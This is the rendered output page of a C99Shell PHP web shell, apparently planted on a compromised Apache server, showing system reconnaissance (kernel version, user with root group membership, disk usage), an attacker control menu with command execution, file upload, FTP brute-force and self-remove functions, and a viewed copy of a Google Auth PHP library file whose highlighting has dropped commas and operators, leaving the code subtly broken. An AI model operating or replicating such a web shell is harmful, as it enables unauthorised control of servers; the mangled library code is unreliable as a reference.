!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/qr.picotech.app/public_html_v3_4/vendor/google/auth/src/Credentials/   drwxr-xr-x
Free 23.86 GB of 117.98 GB (20.22%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ExternalAccountCredentials.php (8.42 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2023 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

namespace Google\Auth\Credentials;

use 
Google\Auth\CredentialSource\AwsNativeSource;
use 
Google\Auth\CredentialSource\FileSource;
use 
Google\Auth\CredentialSource\UrlSource;
use 
Google\Auth\ExternalAccountCredentialSourceInterface;
use 
Google\Auth\FetchAuthTokenInterface;
use 
Google\Auth\GetQuotaProjectInterface;
use 
Google\Auth\HttpHandler\HttpClientCache;
use 
Google\Auth\HttpHandler\HttpHandlerFactory;
use 
Google\Auth\OAuth2;
use 
Google\Auth\UpdateMetadataInterface;
use 
Google\Auth\UpdateMetadataTrait;
use 
GuzzleHttp\Psr7\Request;
use 
InvalidArgumentException;

class 
ExternalAccountCredentials implements FetchAuthTokenInterfaceUpdateMetadataInterfaceGetQuotaProjectInterface
{
    use 
UpdateMetadataTrait;

    private const 
EXTERNAL_ACCOUNT_TYPE 'external_account';

    private 
OAuth2 $auth;
    private ?
string $quotaProject;
    private ?
string $serviceAccountImpersonationUrl;

    
/**
     * @param string|string[] $scope   The scope of the access request, expressed either as an array
     *                                 or as a space-delimited string.
     * @param array<mixed>    $jsonKey JSON credentials as an associative array.
     */
    
public function __construct(
        
$scope,
        array 
$jsonKey
    
) {
        if (!
array_key_exists('type'$jsonKey)) {
            throw new 
InvalidArgumentException('json key is missing the type field');
        }
        if (
$jsonKey['type'] !== self::EXTERNAL_ACCOUNT_TYPE) {
            throw new 
InvalidArgumentException(sprintf(
                
'expected "%s" type but received "%s"',
                
self::EXTERNAL_ACCOUNT_TYPE,
                
$jsonKey['type']
            ));
        }

        if (!
array_key_exists('token_url'$jsonKey)) {
            throw new 
InvalidArgumentException(
                
'json key is missing the token_url field'
            
);
        }

        if (!
array_key_exists('audience'$jsonKey)) {
            throw new 
InvalidArgumentException(
                
'json key is missing the audience field'
            
);
        }

        if (!
array_key_exists('subject_token_type'$jsonKey)) {
            throw new 
InvalidArgumentException(
                
'json key is missing the subject_token_type field'
            
);
        }

        if (!
array_key_exists('credential_source'$jsonKey)) {
            throw new 
InvalidArgumentException(
                
'json key is missing the credential_source field'
            
);
        }

        if (
array_key_exists('service_account_impersonation_url'$jsonKey)) {
            
$this->serviceAccountImpersonationUrl $jsonKey['service_account_impersonation_url'];
        }

        
$this->quotaProject $jsonKey['quota_project_id'] ?? null;

        
$this->auth = new OAuth2([
            
'tokenCredentialUri' => $jsonKey['token_url'],
            
'audience' => $jsonKey['audience'],
            
'scope' => $scope,
            
'subjectTokenType' => $jsonKey['subject_token_type'],
            
'subjectTokenFetcher' => self::buildCredentialSource($jsonKey),
        ]);
    }

    
/**
     * @param array<mixed> $jsonKey
     */
    
private static function buildCredentialSource(array $jsonKey): ExternalAccountCredentialSourceInterface
    
{
        
$credentialSource $jsonKey['credential_source'];
        if (isset(
$credentialSource['file'])) {
            return new 
FileSource(
                
$credentialSource['file'],
                
$credentialSource['format']['type'] ?? null,
                
$credentialSource['format']['subject_token_field_name'] ?? null
            
);
        }

        if (
            isset(
$credentialSource['environment_id'])
            && 
=== preg_match('/^aws(\d+)$/'$credentialSource['environment_id'], $matches)
        ) {
            if (
$matches[1] !== '1') {
                throw new 
InvalidArgumentException(
                    
"aws version \"$matches[1]\" is not supported in the current build."
                
);
            }
            if (!
array_key_exists('regional_cred_verification_url'$credentialSource)) {
                throw new 
InvalidArgumentException(
                    
'The regional_cred_verification_url field is required for aws1 credential source.'
                
);
            }
            if (!
array_key_exists('audience'$jsonKey)) {
                throw new 
InvalidArgumentException(
                    
'aws1 credential source requires an audience to be set in the JSON file.'
                
);
            }

            return new 
AwsNativeSource(
                
$jsonKey['audience'],
                
$credentialSource['regional_cred_verification_url'],   // $regionalCredVerificationUrl
                
$credentialSource['region_url'] ?? null,               // $regionUrl
                
$credentialSource['url'] ?? null,                      // $securityCredentialsUrl
                
$credentialSource['imdsv2_session_token_url'] ?? null// $imdsV2TokenUrl
            
);
        }

        if (isset(
$credentialSource['url'])) {
            return new 
UrlSource(
                
$credentialSource['url'],
                
$credentialSource['format']['type'] ?? null,
                
$credentialSource['format']['subject_token_field_name'] ?? null,
                
$credentialSource['headers'] ?? null,
            );
        }

        throw new 
InvalidArgumentException('Unable to determine credential source from json key.');
    }
    
/**
     * @param string $stsToken
     * @param callable $httpHandler
     *
     * @return array<mixed> {
     *     A set of auth related metadata, containing the following
     *
     *     @type string $access_token
     *     @type int $expires_at
     * }
     */
    
private function getImpersonatedAccessToken(string $stsToken, callable $httpHandler null): array
    {
        if (!isset(
$this->serviceAccountImpersonationUrl)) {
            throw new 
InvalidArgumentException(
                
'service_account_impersonation_url must be set in JSON credentials.'
            
);
        }
        
$request = new Request(
            
'POST',
            
$this->serviceAccountImpersonationUrl,
            [
                
'Content-Type' => 'application/json',
                
'Authorization' => 'Bearer ' $stsToken,
            ],
            (string) 
json_encode([
                
'lifetime' => sprintf('%ss'OAuth2::DEFAULT_EXPIRY_SECONDS),
                
'scope' => $this->auth->getScope(),
            ]),
        );
        if (
is_null($httpHandler)) {
            
$httpHandler HttpHandlerFactory::build(HttpClientCache::getHttpClient());
        }
        
$response $httpHandler($request);
        
$body json_decode((string) $response->getBody(), true);
        return [
            
'access_token'  => $body['accessToken'],
            
'expires_at'    => strtotime($body['expireTime']),
        ];
    }

    
/**
     * @param callable $httpHandler
     *
     * @return array<mixed> {
     *     A set of auth related metadata, containing the following
     *
     *     @type string $access_token
     *     @type int $expires_at (impersonated service accounts only)
     *     @type int $expires_in (identity pool only)
     *     @type string $issued_token_type (identity pool only)
     *     @type string $token_type (identity pool only)
     * }
     */
    
public function fetchAuthToken(callable $httpHandler null)
    {
        
$stsToken $this->auth->fetchAuthToken($httpHandler);

        if (isset(
$this->serviceAccountImpersonationUrl)) {
            return 
$this->getImpersonatedAccessToken($stsToken['access_token'], $httpHandler);
        }

        return 
$stsToken;
    }

    public function 
getCacheKey()
    {
        return 
$this->auth->getCacheKey();
    }

    public function 
getLastReceivedToken()
    {
        return 
$this->auth->getLastReceivedToken();
    }

    
/**
     * Get the quota project used for this API request
     *
     * @return string|null
     */
    
public function getQuotaProject()
    {
        return 
$this->quotaProject;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--